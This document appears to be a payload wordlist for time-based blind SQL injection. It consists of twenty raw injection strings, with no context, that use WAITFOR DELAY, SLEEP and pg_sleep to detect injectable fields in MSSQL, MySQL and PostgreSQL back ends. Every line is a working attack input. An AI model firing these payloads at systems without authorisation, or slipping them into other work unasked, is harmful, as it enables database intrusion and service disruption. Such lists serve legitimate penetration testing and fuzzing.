'; WAITFOR DELAY '0:0:5'--
'; IF(1=1) WAITFOR DELAY '0:0:5'--
1; WAITFOR DELAY '0:0:5'--
'; SELECT SLEEP(5)--
1 AND SLEEP(5)
' AND SLEEP(5)--
1' AND SLEEP(5)-- -
' OR SLEEP(5)--
1 OR SLEEP(5)
' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
1 AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
' OR (SELECT * FROM (SELECT(SLEEP(5)))a)--
' AND IF(1=1,SLEEP(5),0)--
1 AND IF(1=1,SLEEP(5),0)
' OR IF(1=1,SLEEP(5),0)--
'; SELECT pg_sleep(5)--
1; SELECT pg_sleep(5)
'; IF(1=1) SELECT SLEEP(5)--
'; SELECT 1 WHERE 1=1 AND SLEEP(5)--
' AND 1=(SELECT 1 FROM (SELECT SLEEP(5))a)--
